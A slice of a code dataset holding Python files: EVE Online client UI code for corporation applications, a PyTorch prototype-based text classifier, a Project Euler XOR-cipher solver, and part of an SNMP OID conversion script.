uicontrols.Window.CloseIfOpen(windowID='viewApplicationWindow')\n\n def AcceptInvitation(self, *args):\n 
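# the character accepts the corporation's invitation; the shared helper pushes the new status to the server\n        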
self._UpdateCurrentApplicationWithStatus(const.crpApplicationAcceptedByCharacter)\n\n def WithdrawMyApplication(self, *args):\n self._UpdateCurrentApplicationWithStatus(const.crpApplicationWithdrawnByCharacter)\n\n def RejectCorpInvitation(self, *args):\n self._UpdateCurrentApplicationWithStatus(const.crpApplicationRejectedByCharacter)\n\n def AcceptCorpApplication(self, *args):\n self._UpdateCurrentApplicationWithStatus(const.crpApplicationAcceptedByCorporation)\n\n def RejectCorpApplication(self, *args):\n RejectCorpApplicationWnd.CloseIfOpen(windowID='rejectCorpApplication')\n application = self.sr.node.application\n RejectCorpApplicationWnd.Open(application=application)\n\n\ndef _GetApplicationStatusLabel(applicationStatusID):\n return localization.GetByLabel(APPLICATION_STATUS_LABELNAMES[applicationStatusID])\n\n\ndef _LoadApplicationFilterSetting(applicationStatusID, default):\n return settings.char.ui.Get(_GetSettingsKeyName(applicationStatusID), default)\n\n\ndef _SaveApplicationFilterSetting(applicationStatusID, value):\n settings.char.ui.Set(_GetSettingsKeyName(applicationStatusID), value)\n\n\ndef _GetSettingsKeyName(applicationStatusID):\n return STATUS_SETTING_NAME % applicationStatusID\n\n\nclass RejectCorpApplicationWnd(uicontrols.Window):\n __guid__ = 'form.RejectCorpApplicationWnd'\n default_width = 400\n default_height = 280\n default_minSize = (default_width, default_height)\n\n def ApplyAttributes(self, attributes):\n uicontrols.Window.ApplyAttributes(self, attributes)\n self.application = attributes.application\n self.windowID = 'rejectCorpApplication'\n self.DefineButtons(uiconst.OKCANCEL, okFunc=self.Reject, cancelFunc=self.Cancel, okLabel=localization.GetByLabel('UI/Corporations/CorpApplications/RejectApplication'))\n wndCaption = localization.GetByLabel('UI/Corporations/Applications/ApplicationRejection')\n self.SetCaption(wndCaption)\n self.SetTopparentHeight(0)\n self.MakeUnResizeable()\n topCont = Container(parent=self.sr.main, align=uiconst.TOTOP, height=58)\n textCont = Container(parent=self.sr.main, align=uiconst.TOALL, padding=8)\n charName = cfg.eveowners.Get(self.application.characterID).name\n corpName = cfg.eveowners.Get(self.application.corporationID).name\n logoParent = uiprimitives.Container(parent=topCont, align=uiconst.TOPLEFT, pos=(8,\n 6,\n 48,\n 48))\n uiutil.GetOwnerLogo(logoParent, self.application.characterID, size=48, noServerCall=True)\n characterLink = localization.GetByLabel('UI/Contracts/ContractsWindow/ShowInfoLink', showInfoName=charName, info=('showinfo', const.typeCharacterAmarr, self.application.characterID))\n nameLabel = EveLabelMedium(parent=topCont, left=64, top=12, text=characterLink, align=uiconst.TOTOP, state=uiconst.UI_NORMAL)\n applicationDate = localization.GetByLabel('UI/Corporations/Applications/ApplicationDate', applicationDateTime=self.application.applicationDateTime)\n dateLabel = EveLabelMedium(parent=topCont, left=64, top=2, text=applicationDate, align=uiconst.TOTOP, state=uiconst.UI_NORMAL)\n messageLabel = EveLabelMedium(parent=textCont, align=uiconst.TOTOP, text=localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationRejectionText', charName=charName, corpName=corpName))\n regardsLabel = EveLabelMedium(parent=textCont, align=uiconst.TOBOTTOM, text=localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationRejectionRegards', corpName=corpName), padTop=4)\n self.messageTextEdit = uicls.EditPlainText(parent=textCont, maxLength=1000, 
hintText=localization.GetByLabel('UI/Corporations/CorpApplications/CorpRejectionMessage'), top=4)\n\n    def Reject(self, *args):\n        try:\n            sm.GetService('corpui').ShowLoad()\n            customMessage = self.messageTextEdit.GetValue()\n            sm.GetService('corp').UpdateApplicationOffer(self.application.applicationID, self.application.characterID, self.application.corporationID, self.application.applicationText, const.crpApplicationRejectedByCorporation, customMessage=customMessage)\n        finally:\n            sm.GetService('corpui').HideLoad()\n            uicontrols.Window.CloseIfOpen(windowID='viewApplicationWindow')\n            self.Close()\n\n    def Cancel(self, *args):\n        self.Close()\n\n\nclass InviteToCorpWnd(uicontrols.Window):\n    __guid__ = 'form.InviteToCorpWnd'\n    default_width = 320\n    default_height = 300\n    default_windowID = 'InviteToCorpWnd'\n    default_iconNum = 'res:/ui/Texture/WindowIcons/corporation.png'\n\n    def ApplyAttributes(self, attributes):\n        uicontrols.Window.ApplyAttributes(self, attributes)\n        self.searchStr = ''\n        self.scope = 'all'\n        self.SetMinSize([320, 300])\n        self.SetWndIcon(self.iconNum)\n        self.scroll = uicontrols.Scroll(parent=self.sr.main, padding=(const.defaultPadding, const.defaultPadding, const.defaultPadding, const.defaultPadding))\n        self.scroll.Startup()\n        self.scroll.multiSelect = 0\n        self.standardBtns = uicontrols.ButtonGroup(btns=[\n        [\n            localization.GetByLabel('UI/Ship/ShipConfig/Invite'),\n            self.InviteToCorp, (), 81], [localization.GetByLabel('UI/Common/Buttons/Cancel'), self.OnCancel, (), 81]])\n        self.inviteButton = self.standardBtns.GetBtnByIdx(0)\n        self.inviteButton.Disable()\n        self.sr.main.children.insert(0, self.standardBtns)\n        self.SetCaption(localization.GetByLabel('UI/Messages/SelectCharacterTitle'))\n        self.label = uicontrols.EveLabelSmall(text=localization.GetByLabel('UI/Shared/TypeSearchString'), parent=self.sr.topParent, left=70, top=16, state=uiconst.UI_NORMAL)\n        self.nameInput = uicontrols.SinglelineEdit(name='edit', parent=self.sr.topParent, pos=(70, self.label.top + self.label.height + 2, 86, 0), align=uiconst.TOPLEFT, maxLength=32)\n        self.nameInput.OnReturn = self.Search\n        btn = uicontrols.Button(parent=self.sr.topParent, label=localization.GetByLabel('UI/Wallet/WalletWindow/WalletSearch'), pos=(self.nameInput.left + self.nameInput.width + 2, self.nameInput.top, 0, 0), func=self.Search, btn_default=1)\n        self.SetHint(localization.GetByLabel('UI/Common/TypeInSearch'))\n\n    def Search(self, *args):\n        scrolllist = []\n        self.inviteButton.Disable()\n        self.ShowLoad()\n        try:\n            self.searchStr = self.GetSearchStr()\n            self.SetHint()\n            if len(self.searchStr) < 1:\n                self.SetHint(localization.GetByLabel('UI/Shared/PleaseTypeSomething'))\n                return\n            result = sm.RemoteSvc('lookupSvc').LookupEvePlayerCharacters(self.searchStr, 0)\n            if result is None or not len(result):\n                self.SetHint(localization.GetByLabel('EVE/UI/Wallet/WalletWindow/SearchNoResults'))\n                return\n            cfg.eveowners.Prime([ each.characterID for each in result ])\n            for each in result:\n                owner = cfg.eveowners.Get(each.characterID)\n                scrolllist.append(listentry.Get('Item', {'label': owner.name,'typeID': owner.typeID,'itemID': each.characterID,'OnClick': self.EnableInviteButton,'OnDblClick': self.InviteToCorp}))\n\n        finally:\n            self.scroll.Load(fixedEntryHeight=18, contentList=scrolllist, noContentHint=localization.GetByLabel('UI/Wallet/WalletWindow/SearchNoResults'))\n            self.HideLoad()\n\n        return\n\n    def EnableInviteButton(self, *args):\n        if self.GetSelected():\n            self.inviteButton.Enable()\n\n    def GetSearchStr(self):\n        return 
self.nameInput.GetValue().strip()\n\n def SetHint(self, hintstr=None):\n if self.scroll:\n self.scroll.ShowHint(hintstr)\n\n def InviteToCorp(self, *args):\n sel = self.GetSelected()\n if sel:\n charID = sel[0].itemID\n sm.StartService('corp').InviteToJoinCorp(charID)\n self.CloseByUser()\n\n def GetSelected(self):\n sel = self.scroll.GetSelected()\n return sel\n\n def OnCancel(self, *args):\n self.CloseByUser()","sub_path":"client/eve/client/script/ui/shared/neocom/corporation/corp_ui_applications.py","file_name":"corp_ui_applications.py","file_ext":"py","file_size_in_byte":46185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"223260634","text":"\"\"\"Vanilla recurrent network model for sequences tagging.\"\"\"\nimport torch\nimport torch.nn as nn\nfrom src.models.tagger_base import TaggerBase\nfrom src.layers.layer_word_embeddings import LayerWordEmbeddings\nfrom src.layers.layer_bilstm import LayerBiLSTM\nfrom src.layers.layer_proto import LayerProto\nfrom src.layers.layer_pooler import LayerPooler\nfrom src.classes.utils import *\nimport numpy as np\nimport math\nimport time\nfrom sklearn.cluster import KMeans\nfrom anchor.anchor.utils import perturb_sentence\n\n\nclass TaggerProtoBiRNN(TaggerBase):\n \"\"\"TaggerBiRNN is a Vanilla recurrent network model for sequences tagging.\"\"\"\n def __init__(self, word_seq_indexer, tag_seq_indexer, class_num, batch_size=1, rnn_hidden_dim=100,\n freeze_word_embeddings=False, dropout_ratio=0.5, rnn_type='GRU', gpu=-1,\n num_prototypes_per_class=6, proto_dim = None, pretrained_path = None, max_pool_protos = False,\n pooling_type = 'attention', similarity_epsilon = 1e-4, hadamard_importance = False,\n similarity_function_name = 'log_inv_distance'):\n super(TaggerProtoBiRNN, self).__init__(word_seq_indexer, tag_seq_indexer, gpu, batch_size)\n self.tag_seq_indexer = tag_seq_indexer\n self.class_num = class_num\n self.rnn_hidden_dim = rnn_hidden_dim\n self.freeze_embeddings = freeze_word_embeddings\n self.dropout_ratio = dropout_ratio\n self.rnn_type = rnn_type\n self.gpu = gpu \n self.dropout = torch.nn.Dropout(p=dropout_ratio)\n self.num_prototypes_per_class = num_prototypes_per_class\n self.num_prototypes = class_num * num_prototypes_per_class\n self.proto_dim = proto_dim\n self.max_pool = max_pool_protos\n self.hadamard_importance = hadamard_importance\n\n # parameters\n self.prototypes_shape = (self.num_prototypes, self.proto_dim, 1) # the last dimension is 1 since the prototype vectors are used as a conv1d filter weight\n self.prototypes = nn.Parameter(torch.rand(self.prototypes_shape))\n\n # layers\n self.word_embeddings_layer = LayerWordEmbeddings(word_seq_indexer, gpu, freeze_word_embeddings) \n\n self.birnn_layer = LayerBiLSTM(input_dim=self.word_embeddings_layer.output_dim,\n hidden_dim=rnn_hidden_dim,\n gpu=gpu)\n self.pooler = LayerPooler(input_dim = self.birnn_layer.output_dim, gpu=gpu, pooling_type = pooling_type)\n \n self.dim_red = nn.Sequential(\n nn.Linear(in_features=self.pooler.output_dim, out_features=proto_dim),\n nn.Sigmoid()\n ) \n \n self.proto_layer = LayerProto(input_dim=self.proto_dim, prototypes=self.prototypes, num_classes = class_num,\n num_prototypes_per_class = num_prototypes_per_class, gpu=gpu, max_pool = max_pool_protos, \n similarity_epsilon = similarity_epsilon, hadamard_importance = hadamard_importance,\n similarity_function_name = similarity_function_name)\n \n self.lin_layer = nn.Linear(in_features=self.proto_layer.output_dim, out_features=class_num, bias 
= False)\n \n self.log_softmax_layer = nn.LogSoftmax(dim=1)\n if gpu >= 0:\n self.cuda(device=self.gpu)\n self.nll_loss = nn.NLLLoss() \n\n # init weights and set grad reqs\n self._initialize_weights()\n self._set_grad_reqs()\n \n\n def forward(self, word_sequences):\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n z_out = self.lin_layer(proto_output_h) # shape: batch_size x class_num \n y = self.log_softmax_layer(z_out) # shape: batch_size x class_num\n return y\n\n def get_logprobs_and_distances(self, word_sequences):\n '''distances needed for the loss, but .forward used throughout this codebase. so this function appears in main.py'''\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n z_out = self.lin_layer(proto_output_h) # shape: batch_size x class_num \n y = self.log_softmax_layer(z_out) # shape: batch_size x class_num \n return y, distances\n\n def get_logits(self, word_sequences):\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n z_out = self.lin_layer(proto_output_h) # shape: batch_size x class_num \n return z_out\n\n def push_forward(self, word_sequences):\n '''used in push step'''\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n return latent_h, distances # latent shape: batch_size x proto_dim. distances shape: batch_size x num_prototypes\n\n def get_proto_output(self, word_sequences):\n '''used when gathering similarity scores, e.g. 
in self.explain_instance'''\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n return proto_output_h, distances\n\n def initialize_from_pretrained(self, pretrained_path):\n print(\"Initializing model weights from model at %s\" % pretrained_path)\n pretrained_model = torch.load(pretrained_path)\n state_dict = pretrained_model.state_dict()\n \n # delete classifier weights\n del state_dict['lin_layer.weight']\n del state_dict['lin_layer.bias']\n # delete dim reduction weights if they don't match pretrained model's dimensionality\n if state_dict['dim_red.0.weight'].shape != self.dim_red[0].weight.shape:\n print(\"Dimension reduction matrix from pretrained model does not match this model's in shape!\")\n del state_dict['dim_red.0.weight']\n del state_dict['dim_red.0.bias']\n \n self.load_state_dict(state_dict, strict = False)\n\n\n def get_lin_layer_l1(self):\n '''returns l1 penalty on off-prototype-class-connection weights in lin_layer'''\n if self.max_pool:\n identity = torch.eye(self.class_num).cuda()\n mask = 1 - identity\n masked_weight = self.lin_layer.weight * mask\n else:\n identity = torch.eye(self.class_num).cuda()\n repeated_identity = identity.unsqueeze(2).repeat(1,1,self.num_prototypes_per_class).\\\n view(self.class_num, -1)\n mask = 1 - repeated_identity\n masked_weight = self.lin_layer.weight * mask \n return masked_weight.norm(p=1) \n\n def get_sep_loss(self, distances, word_sequences, targets_tensor):\n ''' \n return the mean distance between each instance and its closest off-class prototype \n distances should be shape: batch_size x num_prototypes\n need to mask the on-class prototype distances\n\n don't penalize distances once they're at least 4\n '''\n\n # mask the on-class prototype distances (set to 1e9)\n batch_size = targets_tensor.shape[0]\n for i in range(batch_size):\n target = targets_tensor[i].item()\n onclass_prototype_idx = np.arange(target * self.num_prototypes_per_class, (target+1) * self.num_prototypes_per_class)\n mask = torch.ones(batch_size, self.num_prototypes)\n mask[i, onclass_prototype_idx] = 1e9\n mask = mask.cuda()\n distances = distances * mask\n\n closest_distances, _ = torch.min(distances, dim = 1)\n max_to_penalize = 4 * torch.ones_like(closest_distances)\n stacked_distances_and_caps = torch.stack((closest_distances,max_to_penalize),dim=0)\n capped_closest_distances, _ = torch.min(stacked_distances_and_caps,dim=0)\n neg_avg_closest_distance = -torch.mean(capped_closest_distances)\n return neg_avg_closest_distance\n \n\n def get_loss(self, args, word_sequences_train_batch, tag_sequences_train_batch):\n # defunct, loss now calculated in main.py\n outputs_tensor_train_batch_one_hot, distances = self.get_logprobs_and_distances(word_sequences_train_batch)\n targets_tensor_train_batch = self.tag_seq_indexer.items2tensor(tag_sequences_train_batch)\n cross_entropy = self.nll_loss(outputs_tensor_train_batch_one_hot, targets_tensor_train_batch)\n\n sep_loss = self.get_sep_loss(distances, word_sequences_train_batch, targets_tensor_train_batch)\n lin_layer_reg = 
self.get_lin_layer_l1()\n\n        loss = cross_entropy + 1/10 * lin_layer_reg + 1/100 * sep_loss\n\n        return loss\n\n\n    def freeze_unfreeze_parameters(self, epoch, args):\n        # linear layer\n        set_to = (epoch >= args.unfreeze_lin_layer)\n        self.lin_layer.weight.requires_grad = set_to # there is no lin_layer.bias\n\n        if args.hadamard_importance:\n            assert args.unfreeze_lin_layer > 999, \"Using hadamard weighting in proto_layer, should keep tagger.lin_layer frozen as an identity matrix (i.e. set to at least 999)\"\n        \n        # every other layer: toggle requires_grad on the parameters themselves\n        # (assigning requires_grad to a Module object is a silent no-op for autograd)\n        set_to = (epoch >= args.unfreeze_feature_extractor)\n        for layer in (self.word_embeddings_layer, self.birnn_layer.rnn, self.pooler, self.dim_red):\n            for p in layer.parameters():\n                p.requires_grad = set_to\n\n\n    def _initialize_weights(self):\n        \n        def _initialize_random_projection(m):\n            if type(m) == nn.Linear:\n                torch.nn.init.normal_(m.weight, mean=0, std = 1 / (m.out_features ** 0.5) ) # std = 1/sqrt(out_features)\n\n        def _initialize_lin_layer(self):\n            if self.max_pool:\n                identity = torch.eye(self.class_num)\n                self.lin_layer.weight.data.copy_(identity)\n            else:\n                identity = torch.eye(self.class_num)\n                repeated_identity = identity.unsqueeze(2).repeat(1,1,self.num_prototypes_per_class).\\\n                    view(self.class_num, -1)\n                self.lin_layer.weight.data.copy_(repeated_identity)\n\n        _initialize_lin_layer(self)\n        self.dim_red.apply(_initialize_random_projection)\n\n\n    def _set_grad_reqs(self):\n        # freeze every parameter except the prototype vectors\n        for p in self.parameters():\n            p.requires_grad = False\n        self.prototypes.requires_grad = True\n\n\n    def initialize_prototypes_empirical(self, word_sequences, tag_sequences, batch_size = 10):\n        '''initialize prototypes for each class by k-means on that classes latent representations (class given by labels)'''\n        print(\"Initializing prototypes empirically\")\n        self.eval()\n        class2vecs = dict()\n        class_id_list = [i for i in range(0, self.class_num)] \n\n        for i in class_id_list:\n            class2vecs[i] = []\n        \n        # for each batch, get vecs and ids, add vecs to class2vecs based on ids\n        batch_num = math.floor(len(word_sequences) / batch_size)\n        if len(word_sequences) > 0 and len(word_sequences) < batch_size:\n            batch_num = 1\n\n        start_time = time.time()\n        \n        for n in range(batch_num):\n            i = n*batch_size\n            if n < batch_num - 1:\n                j = (n + 1)*batch_size\n            else:\n                j = len(word_sequences)\n            \n            batch = word_sequences[i:j]\n            targets = self.tag_seq_indexer.items2idx(tag_sequences[i:j])\n            mask = self.get_mask_from_word_sequences(batch) \n            latents, distances = self.push_forward(batch) # latents: batch_size x proto_dim\n            for k in range(len(batch)): \n                class_id = targets[k]\n                latent_vec = latents[k, :].detach().cpu().numpy()\n                class2vecs[class_id].append(latent_vec)\n\n        print('gathering latent vecs took %.1f seconds' % (time.time() - start_time))\n\n        # there are a variety of ways to move the data from kmeans.cluster_centers_ to self.prototypes, of course\n        # but copying with splices directly to self.prototypes_[idx,:,:] was silently failing, so we preallocate and .copy_ all at once\n        new_prototypes = torch.zeros(0, self.proto_dim, 1) \n        for i in class_id_list:\n            
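# cluster this class's latent vectors; the k-means centers become the class's initial prototypes\n            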
class_data = np.array(class2vecs[i])\n            # indices of class i's prototype slots (currently unused below)\n            proto_idx = [idx for idx in range(self.num_prototypes_per_class*i,\\\n                                            self.num_prototypes_per_class*(i+1))]\n            kmeans = KMeans(n_clusters = self.num_prototypes_per_class)\n            kmeans.fit(class_data)\n\n            centers = torch.Tensor(kmeans.cluster_centers_).view(self.num_prototypes_per_class, self.proto_dim, 1)\n            new_prototypes = torch.cat((new_prototypes, centers), 0) \n\n        self.prototypes.data.copy_(new_prototypes)\n\n\n    def explain_instance(self, word_sequence, saliency_type = 'directional', neighbors_obj = None, language_model = None, tokenizer = None,\n                    counterfactual_method = 'unk', decision_boundary = False):\n        # word_sequence should be text with tokens separated by spaces or list of tokens\n        self.eval()\n\n        # adjust formatting for string inputs\n        if type(word_sequence) is str:\n            word_sequence = word_sequence.split()\n\n        # local vars\n        classes = self.tag_seq_indexer.idx2items([0,1])\n        text = ' '.join(word_sequence)\n        m = 10 # multiple for scaling the logits. easier to read values on the integer rather than decimal scale\n\n        # original prediction and logits\n        orig_logits = self.get_logits([word_sequence]).squeeze().detach().cpu()\n        pred = np.argmax(orig_logits)\n        predicted_tag = classes[pred]\n        opposite_tag = classes[1-pred]\n        \n        # local vars\n        prototype_dict = self.prototype_dict\n        n_protos_per_class = self.num_prototypes_per_class\n        max_activation = self.proto_layer.similarity_score(torch.zeros(1)).item()\n\n        # proto output \n        proto_output, distances = self.get_proto_output([word_sequence])\n        proto_output = proto_output.detach().cpu().squeeze()\n        distances = distances.detach().cpu().squeeze()\n        prototype_id = np.argmin(distances).item()\n        activated_prototype = prototype_dict[prototype_id]\n        similarity_score = self.proto_layer.similarity_score(torch.min(distances)).item()\n\n        # get signed evidence measure\n        signed_evidence_str = '+%.2f' % (m*similarity_score) if activated_prototype.tag == 'pos' else '-%.2f' % (m*similarity_score)\n\n        # proto and input salience \n        orig_explanation = self.prototype_saliency_map(word_sequence, \n                                            saliency_type = saliency_type, \n                                            prototype_id = prototype_id, \n                                            neighbors_obj = neighbors_obj,\n                                            language_model = language_model,\n                                            tokenizer = tokenizer,\n                                            counterfactual_method = counterfactual_method)\n\n\n        # if not going to look at a perturbation of the opposite predicted class, then go ahead and assemble the explanation\n        explanation = \"Most activated prototype (label: %s) | evidence: %s \\n\" % (predicted_tag, signed_evidence_str) + \\\n                activated_prototype.to_str() + '\\n----\\n' + \\\n                \"Informative words in input:\\n\" + \\\n                orig_explanation\n        \n        return explanation\n\n\n\n    def prototype_saliency_map(self, word_sequence, prototype_id, saliency_type = 'directional', num_perturbations = 1000, neighbors_obj = None, \n                    counterfactual_method = 'unk', language_model = None, tokenizer = None):\n        '''\n        get feature importance scores for prototype model using word omission with counterfactual_method approach\n        '''\n\n        # prep tagger\n        self.zero_grad()\n        self.eval()\n        \n        # local variables\n        n_protos_per_class = self.num_prototypes_per_class\n        class_id = prototype_id // n_protos_per_class\n        start = time.time()\n        m = 10 # multiple for word importance values and logits. easier to read values on the integer scale than decimal.\n        \n        # should clean this up with arguments, since this is computed in .explain_instance. 
for now, recompute\n predicted_tag = self.predict_tags_from_words([word_sequence], constrain_to_classes = None, quiet = True)[0]\n\n # get valid_idx for words to sample in expected_word method\n if counterfactual_method == 'expected_word':\n all_vocab = [force_ascii(tokenizer._convert_id_to_token(i)) for i in range(tokenizer.vocab_size)]\n valid_vocab = [word for word in all_vocab if word in self.word_seq_indexer.item2idx_dict]\n valid_idx = np.argwhere([word in self.word_seq_indexer.item2idx_dict for word in all_vocab]).reshape(-1)\n\n # forward pass\n logits = self.get_logits([word_sequence])\n selected_logit = torch.max(logits) if class_id is None else logits[0,class_id] \n selected_logit = selected_logit.detach().cpu()\n\n # need class ids to possibly negate the importance values later\n neg_class_id = self.tag_seq_indexer.item2idx_dict['neg']\n pred_class_id = torch.argmax(logits.view(-1)).item()\n explain_class_id = pred_class_id if class_id is None else class_id\n\n # get avg. difference in selected_logit and the class logit obtained from perturbed inputs (perturbed at a specific word)\n logit_differences = np.zeros(len(word_sequence))\n\n for slot_id in range(len(word_sequence)):\n\n # if 'unk' or 'neighbors', fill the slot with either the vector or neighboring words in embedding space (according to counterfactual_method)\n if counterfactual_method != 'expected_word':\n counterfactual_sequences = replace_word(word_sequence, slot_id, neighbors_obj, \n tagger_word_dict = self.word_seq_indexer.item2idx_dict, method = counterfactual_method)\n counterfactual_logits = self.get_logits(counterfactual_sequences).detach().cpu()\n mean_logit = torch.mean(counterfactual_logits[:,explain_class_id])\n \n logit_differences[slot_id] = selected_logit - mean_logit\n\n # if 'expected_word', find the expected logit over p(x_i | x_{-i})\n elif counterfactual_method == 'expected_word':\n expected_logit = expected_score(word_sequence = word_sequence, \n mask_position = slot_id, \n class_id = explain_class_id, \n tagger = self, \n language_model = language_model, \n tokenizer = tokenizer, \n vocab = valid_vocab, \n valid_idx = valid_idx)\n logit_differences[slot_id] = selected_logit - expected_logit\n\n # set importance metric\n importance_metric = logit_differences\n\n # quick fix so that saliency maps are consistently directional between classes. positive values always positive sentiment, negative numbers always negative sentiment\n neg_class_id = self.tag_seq_indexer.item2idx_dict['neg']\n explain_class_id = self.tag_seq_indexer.item2idx_dict[predicted_tag] if class_id is None else class_id\n if explain_class_id == neg_class_id and (saliency_type == 'directional' or saliency_type == 'counterfactual'):\n importance_metric = -importance_metric \n\n # scale by 10 for readability\n importance_metric = m * importance_metric \n \n # get highlighted words\n importance_str = saliency_list_values(word_sequence, importance_metric, saliency_type, print_flat = False)\n\n # print(\"Prototype explanation took %.2f seconds\" % (time.time() - start))\n\n return importance_str\n\n","sub_path":"text/src/models/tagger_proto_birnn.py","file_name":"tagger_proto_birnn.py","file_ext":"py","file_size_in_byte":23242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"550020853","text":"# Project Euler - 059\nimport timeit as t\nimport string as st\n\n# Simple cryptography problem. 
We are given important information to solve it:\n# - The key is a three letter word, so the keyspace is 26**3, which isn't very large.\n# - It contains common English words, so it yelds to frequency analysis.\n# I guessed that the code would preserve punctuation, so I tried every key\n# and counted the number of ASCII spaces it originated. The ASCII code for space\n# is 32, so I tracked that. The maximum number of spaces would point to the\n# correct key. The text size isn't a multiple of 3, so I had to keep that in mind.\n# Since I knew that the key was 3 letters, I could have done a column analysis\n# and tested it as 3 monoalphabetic ciphers. But since the keyspace was so small\n# it was fast enough to just try every key.\n# The resulting passage is from the Gospel of John.\n\n\ndef parse_file(filename):\n with open(filename, 'r') as file:\n return list(map(int, file.readline().strip().split(\",\")))\n\ndef solve_cipher():\n data = parse_file(\"P059_cipher.txt\")\n source = st.ascii_lowercase\n keys = [[ord(a), ord(b), ord(c)] *\n 401 for a in source for b in source for c in source]\n space_count = 0\n best_key = [0, 0, 0]\n ascii_value = 0\n for k in keys:\n candidate = [a ^ b for (a, b) in zip(data, k[:1201])]\n if candidate.count(32) > space_count:\n space_count = candidate.count(32)\n best_key = k[:3]\n ascii_value = sum(candidate)\n return (''.join(chr(x) for x in best_key), ascii_value)\n\n# No-args functions for timeit module.\ndef f():\n return solve_cipher()\n\n# Benchmarks\nprint(\"Timing 1 run.\")\nprint(\"Generate and test:\", t.timeit(f, number=1), \"seconds\")\nprint(\"Result:\", f())\n","sub_path":"001 - 100/P059.py","file_name":"P059.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"377504780","text":"import re\nimport os\nimport itertools\nimport subprocess\n\ndef ipConvert(text):\n if type(text) is str:\n text=text.splitlines()\n new=[]\n for line in text:\n line=line.strip().strip('\"-')\n if not line.isdecimal() :\n continue\n q = []\n for i in range (0, 4):\n bit = (int(line) >> (3-i)*8) & 0xFF\n q.append(str(bit))\n new.append(\".\".join(q))\n return new\n\ndef readcontent():\n with open (filepath) as f: \n return f.readlines()\n\ndef saveData(res):\n with open (newfile,mode='w',encoding='utf-8') as j:\n j.write(';'.join(res))\n\ndef NBoidConvert(text):\n if type(text) is str:\n text=text.splitlines()\n res,key=[],[]\n for line in text:\n \n if not (line.startswith('1.3.6.1.') or line.startswith('.1.3.6.1')):\n continue\n sid=line.split(' =')[0]\n if sid in key:\n print ('Duplicated OID exist:\\t',sid)\n break\n else:\n key.append(sid)\n if line.startswith('1.3.6'):\n line=line.replace('1.3.6','.1.3.6')\n line=line.replace(':\\t',': ')\n line=line.replace(' : ',' = ')\n if line.find(r'OCTETS:')>-1:\n res.append(line.replace('OCTETS:','STRING:'))\n elif line.find(r'TIMETICKS:')>-1:\n res.append(re.sub('TIMETICKS\\: .*','1',line))\n elif line.find(r'COUNTER:')>-1:\n res.append(line.replace('COUNTER:','COUNTER32:'))\n elif line.find(r'SYNTAXOID:') >-1:\n res.append(line.replace('SYNTAXOID:','OID:'))\n elif line.find(r'COUNTER64: 0x') >-1:\n start,value=line.split(r'COUNTER64: 0x')\n res.append(start+r'COUNTER64: '+str(int(value,16))+os.linesep)\n elif line.find(r'Hex-String: ')>-1:\n start,value=line.split('Hex-String: ')\n res.append(start+'Hex-String: '+''.join([' '+m if n!=0 and n%2==0 else m for n,m in enumerate(value)]))\n else:\n res.append(line)\n return 
